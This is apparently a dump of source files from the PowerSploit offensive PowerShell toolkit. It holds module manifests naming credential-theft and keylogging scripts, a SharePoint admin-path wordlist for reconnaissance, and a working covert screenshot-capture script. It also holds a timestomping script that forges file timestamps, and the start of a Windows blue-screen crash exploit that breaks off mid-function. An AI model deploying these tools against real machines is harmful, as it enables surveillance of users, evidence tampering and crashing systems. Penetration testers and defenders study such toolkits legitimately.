            FileName    = $LoadEvent.FileName
            ImageBase   = $LoadEvent.ImageBase
            ImageSize   = $LoadEvent.ImageSize
        }

        # Custom type name; presumably matched by ProcessModuleTrace.format.ps1xml for display - confirm there.
        $ModuleObject.PSObject.TypeNames[0] = 'LOADED_MODULE'

        $ModuleObject
    }

    Register-WmiEvent 'Win32_ModuleLoadTrace' -SourceIdentifier 'ModuleLoaded' -Action $ModuleLoadedAction
}

function Get-ProcessModuleTrace
{
<#
.SYNOPSIS

Displays the process modules that have been loaded since the call to Register-ProcessModuleTrace

PowerSploit Function: Get-ProcessModuleTrace
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: Register-ProcessModuleTrace
Optional Dependencies: None

.DESCRIPTION

Returns the LOADED_MODULE objects emitted so far by the 'ModuleLoaded' subscription that
Register-ProcessModuleTrace created. Throws if no such subscription exists.

.OUTPUTS

PSObject

.LINK

http://www.exploit-monday.com/
#>

    # A missing subscription is reported through the error variable rather than by throwing,
    # so the lookup is silenced and the error variable is checked explicitly.
    $Subscriber = Get-EventSubscriber -SourceIdentifier 'ModuleLoaded' -ErrorVariable NoEventRegistered -ErrorAction SilentlyContinue

    if ($NoEventRegistered)
    {
        throw 'You must execute Register-ProcessModuleTrace before you can retrieve a loaded module list'
    }

    # Objects written by the -Action block are read back from the subscriber's action job.
    $Subscriber.Action.Output
}

function Unregister-ProcessModuleTrace
{
<#
.SYNOPSIS

Stops the running process module trace

PowerSploit Function: Unregister-ProcessModuleTrace
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: Register-ProcessModuleTrace
Optional Dependencies: None

.DESCRIPTION

Removes the 'ModuleLoaded' event subscription created by Register-ProcessModuleTrace.

.LINK

http://www.exploit-monday.com/
#>

    # Tears down the subscription by the same source identifier Register-ProcessModuleTrace used.
    Unregister-Event -SourceIdentifier 'ModuleLoaded'
}
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'CodeExecution.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Code Execution Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 
49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 77 | 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md' 78 | 79 | # Private data to pass to the module specified in RootModule/ModuleToProcess 80 | # PrivateData = '' 81 | 82 | # HelpInfo URI of this module 83 | # HelpInfoURI = '' 84 | 85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 86 | # DefaultCommandPrefix = '' 87 | 88 | } 89 | -------------------------------------------------------------------------------- /ScriptModification/ScriptModification.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'ScriptModification.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Script Preparation/Modification Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 
49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', 77 | 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md' 78 | 79 | # Private data to pass to the module specified in RootModule/ModuleToProcess 80 | # PrivateData = '' 81 | 82 | # HelpInfo URI of this module 83 | # HelpInfoURI = '' 84 | 85 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 
86 | # DefaultCommandPrefix = '' 87 | 88 | } 89 | -------------------------------------------------------------------------------- /Recon/Dictionaries/sharepoint.txt: -------------------------------------------------------------------------------- 1 | _catalogs/masterpage/Forms/AllItems.aspx 2 | _catalogs/wp/Forms/AllItems.aspx 3 | _catalogs/wt/Forms/Common.aspx 4 | _layouts/1033/IMAGES 5 | _layouts/aclinv.aspx 6 | _layouts/addrole.aspx 7 | _layouts/AdminRecycleBin.aspx 8 | _layouts/AreaNavigationSettings.aspx 9 | _Layouts/AreaTemplateSettings.aspx 10 | _Layouts/AreaWelcomePage.aspx 11 | _layouts/associatedgroups.aspx 12 | _layouts/bpcf.aspx 13 | _Layouts/ChangeSiteMasterPage.aspx 14 | _layouts/create.aspx 15 | _layouts/editgrp.aspx 16 | _layouts/editprms.aspx 17 | _layouts/groups.aspx 18 | _layouts/help.aspx 19 | _layouts/images/ 20 | _layouts/listedit.aspx 21 | _layouts/ManageFeatures.aspx 22 | _layouts/ManageFeatures.aspx?Scope=Site 23 | _layouts/mcontent.aspx 24 | _layouts/mngctype.aspx 25 | _layouts/mngfield.aspx 26 | _layouts/mngsiteadmin.aspx 27 | _layouts/mngsubwebs.aspx 28 | _layouts/mngsubwebs.aspx?view=sites 29 | _layouts/mobile/mbllists.aspx 30 | _layouts/MyInfo.aspx 31 | _layouts/MyPage.aspx 32 | _layouts/MyTasks.aspx 33 | _layouts/navoptions.aspx 34 | _layouts/NewDwp.aspx 35 | _layouts/newgrp.aspx 36 | _layouts/newsbweb.aspx 37 | _layouts/PageSettings.aspx 38 | _layouts/people.aspx 39 | _layouts/people.aspx?MembershipGroupId=0 40 | _layouts/permsetup.aspx 41 | _layouts/picker.aspx 42 | _layouts/policy.aspx 43 | _layouts/policyconfig.aspx 44 | _layouts/policycts.aspx 45 | _layouts/Policylist.aspx 46 | _layouts/prjsetng.aspx 47 | _layouts/quiklnch.aspx 48 | _layouts/recyclebin.aspx 49 | _Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage 50 | _layouts/role.aspx 51 | _layouts/settings.aspx 52 | _layouts/SiteDirectorySettings.aspx 53 | _layouts/sitemanager.aspx 54 | _Layouts/SiteManager.aspx?lro=all 55 | _layouts/spcf.aspx 56 | 
_layouts/storman.aspx 57 | _layouts/themeweb.aspx 58 | _layouts/topnav.aspx 59 | _layouts/user.aspx 60 | _layouts/userdisp.aspx 61 | _layouts/userdisp.aspx?ID=1 62 | _layouts/useredit.aspx 63 | _layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx 64 | _layouts/viewgrouppermissions.aspx 65 | _layouts/viewlsts.aspx 66 | _layouts/vsubwebs.aspx 67 | _layouts/WPPrevw.aspx?ID=247 68 | _layouts/wrkmng.aspx 69 | _vti_bin/Admin.asmx 70 | _vti_bin/alerts.asmx 71 | _vti_bin/dspsts.asmx 72 | _vti_bin/forms.asmx 73 | _vti_bin/Lists.asmx 74 | _vti_bin/people.asmx 75 | _vti_bin/Permissions.asmx 76 | _vti_bin/search.asmx 77 | _vti_bin/UserGroup.asmx 78 | _vti_bin/versions.asmx 79 | _vti_bin/Views.asmx 80 | _vti_bin/webpartpages.asmx 81 | _vti_bin/webs.asmx 82 | _vti_bin/spsdisco.aspx 83 | _vti_bin/AreaService.asmx 84 | _vti_bin/BusinessDataCatalog.asmx 85 | _vti_bin/ExcelService.asmx 86 | _vti_bin/SharepointEmailWS.asmx 87 | _vti_bin/spscrawl.asmx 88 | _vti_bin/spsearch.asmx 89 | _vti_bin/UserProfileService.asmx 90 | _vti_bin/WebPartPages.asmx 91 | default.aspx 92 | Forms/DispForm.aspx 93 | Forms/DispForm.aspx?ID=1 94 | Forms/EditForm.aspx 95 | Forms/EditForm.aspx?ID=1 96 | Forms/Forms/AllItems.aspx 97 | Forms/MyItems.aspx 98 | Forms/NewForm.aspx 99 | Pages/default.aspx 100 | Pages/Forms/AllItems.aspx 101 | shared documents/forms/allitems.aspx -------------------------------------------------------------------------------- /Exfiltration/Exfiltration.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Exfiltration.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Exfiltration Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 
49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1', 77 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1', 78 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1' 79 | 80 | # Private data to pass to the module specified in RootModule/ModuleToProcess 81 | # PrivateData = '' 82 | 83 | # HelpInfo URI of this module 84 | # HelpInfoURI = '' 85 | 86 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 87 | # DefaultCommandPrefix = '' 88 | 89 | } 90 | -------------------------------------------------------------------------------- /PETools/PETools.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'PETools.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'd15059e2-8bd9-47ff-8bcd-b708ff90e402' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Portable Executable Analysis Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 
49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | FormatsToProcess = 'PETools.format.ps1xml', 'Get-ObjDump.format.ps1xml', 'Get-LibSymbols.format.ps1xml' 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'PETools'; ModuleVersion = '1.0.0.0'; GUID = 'd15059e2-8bd9-47ff-8bcd-b708ff90e402'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'PETools.psm1', 'PETools.psd1', 'PETools.format.ps1xml', 'Get-DllLoadPath.ps1', 77 | 'Get-PEHeader.ps1', 'Get-ObjDump.ps1', 'Get-ObjDump.format.ps1xml', 'Get-LibSymbols.ps1', 78 | 'Usage.md' 79 | 80 | # Private data to pass to the module specified in RootModule/ModuleToProcess 81 | # PrivateData = '' 82 | 83 | # HelpInfo URI of this module 84 | # HelpInfoURI = '' 85 | 86 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 87 | # DefaultCommandPrefix = '' 88 | 89 | } 90 | -------------------------------------------------------------------------------- /ReverseEngineering/ReverseEngineering.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'ReverseEngineering.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'cbffaf47-c55a-4901-92e7-8d794fbe1fff' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Reverse Engineering Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 
49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | FormatsToProcess = 'Get-PEB.format.ps1xml', 'Get-NtSystemInformation.format.ps1xml', 'Get-ILDisassembly.format.ps1xml', 'ProcessModuleTrace.format.ps1xml' 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'ReverseEngineering'; ModuleVersion = '1.0.0.0'; GUID = 'cbffaf47-c55a-4901-92e7-8d794fbe1fff'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'ReverseEngineering.psm1', 'ReverseEngineering.psd1', 'Get-ILDisassembly.ps1', 'Get-NtSystemInformation.format.ps1xml', 77 | 'Get-NtSystemInformation.ps1', 'Get-Member.ps1', 'Get-MethodAddress.ps1', 'Get-PEB.format.ps1xml', 78 | 'Get-PEB.ps1', 'Get-Strings.ps1', 'Get-StructFromMemory.ps1', 'ConvertTo-String.ps1', 79 | 'Get-Entropy.ps1', 'New-Object.ps1', 'Get-ILDisassembly.format.ps1xml', 'ProcessModuleTrace.ps1', 'Usage.md' 80 | 81 | # Private data to pass to the module specified in RootModule/ModuleToProcess 82 | # PrivateData = '' 83 | 84 | # HelpInfo URI of this module 85 | # HelpInfoURI = '' 86 | 87 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 
88 | # DefaultCommandPrefix = '' 89 | 90 | } 91 | 92 | -------------------------------------------------------------------------------- /Exfiltration/Get-TimedScreenshot.ps1: -------------------------------------------------------------------------------- 1 | function Get-TimedScreenshot 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Takes screenshots at a regular interval and saves them to disk. 7 | 8 | PowerSploit Function: Get-TimedScreenshot 9 | Author: Chris Campbell (@obscuresec) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | A function that takes screenshots and saves them to a folder. 17 | 18 | .PARAMETER Path 19 | 20 | Specifies the folder path. 21 | 22 | .PARAMETER Interval 23 | 24 | Specifies the interval in seconds between taking screenshots. 25 | 26 | .PARAMETER EndTime 27 | 28 | Specifies when the script should stop running, as a 24-hour time in the format HH:mm (e.g. 14:00), matching the comparison the loop performs with Get-Date -Format HH:mm. 29 | 30 | .EXAMPLE 31 | 32 | PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00 33 | 34 | .LINK 35 | 36 | http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html 37 | https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1 38 | #> 39 | 40 | [CmdletBinding()] Param( 41 | [Parameter(Mandatory=$True)] 42 | [ValidateScript({Test-Path -Path $_ })] 43 | [String] $Path, 44 | 45 | [Parameter(Mandatory=$True)] 46 | [Int32] $Interval, 47 | 48 | [Parameter(Mandatory=$True)] 49 | [String] $EndTime 50 | ) 51 | 52 | #Define helper function that generates and saves screenshot 53 | Function Get-Screenshot { 54 | $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen 55 | $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height 56 | $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject) 57 | $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size) 58 | $DrawingGraphics.Dispose() 59 | 
$ScreenshotObject.Save($FilePath) 60 | $ScreenshotObject.Dispose() 61 | } 62 | 63 | Try { 64 | 65 | #load required assembly 66 | Add-Type -Assembly System.Windows.Forms 67 | 68 | Do { 69 | #get the current time and build the filename from it 70 | $Time = (Get-Date) 71 | 72 | [String] $FileName = "$($Time.Month)" 73 | $FileName += '-' 74 | $FileName += "$($Time.Day)" 75 | $FileName += '-' 76 | $FileName += "$($Time.Year)" 77 | $FileName += '-' 78 | $FileName += "$($Time.Hour)" 79 | $FileName += '-' 80 | $FileName += "$($Time.Minute)" 81 | $FileName += '-' 82 | $FileName += "$($Time.Second)" 83 | $FileName += '.png' 84 | 85 | #use join-path to add path to filename 86 | [String] $FilePath = (Join-Path $Path $FileName) 87 | 88 | #run screenshot function 89 | Get-Screenshot 90 | 91 | Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds" 92 | 93 | Start-Sleep -Seconds $Interval 94 | } 95 | 96 | #note that the loop body runs at least once, even if the specified end time has already passed, because the condition is evaluated after the first iteration 97 | While ((Get-Date -Format HH:mm) -lt $EndTime) 98 | } 99 | 100 | Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage} 101 | } 102 | -------------------------------------------------------------------------------- /Staging/Get-MacAttribute.ps1: -------------------------------------------------------------------------------- 1 | function Set-MacAttribute { 2 | <# 3 | .SYNOPSIS 4 | 5 | Sets the modified, accessed and created (Mac) attributes for a file based on another file or input. 6 | 7 | PowerSploit Function: Set-MacAttribute 8 | Author: Chris Campbell (@obscuresec) 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | Version: 1.0.0 13 | 14 | .DESCRIPTION 15 | 16 | Set-MacAttribute sets one or more Mac attributes and returns the new attribute values of the file. 
17 | 18 | .EXAMPLE 19 | 20 | PS C:\> Set-MacAttribute -FilePath c:\test\newfile -OldFilePath c:\test\oldfile 21 | 22 | .EXAMPLE 23 | 24 | PS C:\> Set-MacAttribute -FilePath c:\demo\test.xt -All "01/03/2006 12:12 pm" 25 | 26 | .EXAMPLE 27 | 28 | PS C:\> Set-MacAttribute -FilePath c:\demo\test.txt -Modified "01/03/2006 12:12 pm" -Accessed "01/03/2006 12:11 pm" -Created "01/03/2006 12:10 pm" 29 | 30 | .LINK 31 | 32 | http://www.obscuresec.com 33 | https://github.com/mattifestation/PowerSploit/blob/master/ 34 | #> 35 | [CmdletBinding(DefaultParameterSetName = 'Touch')] 36 | Param ( 37 | 38 | [Parameter(Position = 1,Mandatory = $True)] 39 | [ValidateNotNullOrEmpty()] 40 | [String] 41 | $FilePath, 42 | 43 | [Parameter(ParameterSetName = 'Touch')] 44 | [ValidateNotNullOrEmpty()] 45 | [String] 46 | $OldFilePath, 47 | 48 | [Parameter(ParameterSetName = 'Individual')] 49 | [DateTime] 50 | $Modified, 51 | 52 | [Parameter(ParameterSetName = 'Individual')] 53 | [DateTime] 54 | $Accessed, 55 | 56 | [Parameter(ParameterSetName = 'Individual')] 57 | [DateTime] 58 | $Created, 59 | 60 | [Parameter(ParameterSetName = 'All')] 61 | [DateTime] 62 | $AllMacAttributes 63 | ) 64 | 65 | Set-StrictMode -Version 2.0 66 | 67 | #Helper function that returns an object with the MAC attributes of a file. 
68 | function Get-MacAttribute { 69 | 70 | param($OldFileName) 71 | 72 | if (!(Test-Path $OldFileName)){Throw "File Not Found"} 73 | $FileInfoObject = (Get-Item $OldFileName) 74 | 75 | $ObjectProperties = @{'Modified' = ($FileInfoObject.LastWriteTime); 76 | 'Accessed' = ($FileInfoObject.LastAccessTime); 77 | 'Created' = ($FileInfoObject.CreationTime)}; 78 | $ResultObject = New-Object -TypeName PSObject -Property $ObjectProperties 79 | Return $ResultObject 80 | } 81 | 82 | #test and set variables 83 | if (!(Test-Path $FilePath)){Throw "$FilePath not found"} 84 | 85 | $FileInfoObject = (Get-Item $FilePath) 86 | 87 | if ($PSBoundParameters['All']){ 88 | $Modified = $AllMacAttributes 89 | $Accessed = $AllMacAttributes 90 | $Created = $AllMacAttributes 91 | } 92 | 93 | if ($PSBoundParameters['OldFilePath']){ 94 | 95 | if (!(Test-Path $OldFilePath)){Write-Error "$OldFilePath not found."} 96 | 97 | $CopyFileMac = (Get-MacAttribute $OldFilePath) 98 | $Modified = $CopyFileMac.Modified 99 | $Accessed = $CopyFileMac.Accessed 100 | $Created = $CopyFileMac.Created 101 | } 102 | 103 | if ($Modified) {$FileInfoObject.LastWriteTime = $Modified} 104 | if ($Accessed) {$FileInfoObject.LastAccessTime = $Accessed} 105 | if ($Created) {$FileInfoObject.CreationTime = $Created} 106 | 107 | Return (Get-MacAttribute $FilePath) 108 | } 109 | -------------------------------------------------------------------------------- /CodeExecution/Watch-BlueScreen.ps1: -------------------------------------------------------------------------------- 1 | function Watch-BlueScreen 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Cause a blue screen to occur (Windows 7 and below). 
7 | 8 | PowerSploit Function: Watch-BlueScreen 9 | Author: Matthew Graeber (@mattifestation) 10 | Original Research: Tavis Ormandy and Nikita Tarakanov 11 | License: BSD 3-Clause 12 | Required Dependencies: None 13 | Optional Dependencies: None 14 | 15 | .NOTES 16 | 17 | Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov 18 | tweeted this technique on 5/13/2013. 19 | 20 | .LINK 21 | 22 | https://gist.github.com/taviso/4658638 23 | http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html 24 | https://twitter.com/NTarakanov/status/334031968465453057 25 | #> 26 | [CmdletBinding( ConfirmImpact = 'High')] Param () 27 | 28 | try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException] 29 | { 30 | $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD') 31 | $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run') 32 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False) 33 | $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class') 34 | 35 | $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) 36 | $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') 37 | $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'), 38 | [Reflection.FieldInfo[]]@($SetLastError), @($true)) 39 | 40 | $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC', 41 | 'Gdi32.dll', 42 | 'Public, Static', 43 | 'Standard', 44 | [IntPtr], 45 | @([IntPtr]), 46 | 'Winapi', 47 | 'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute) 48 | 49 | $TypeBuilder.DefinePInvokeMethod( 'SetLayout', 50 | 'Gdi32.dll', 51 | 'Public, 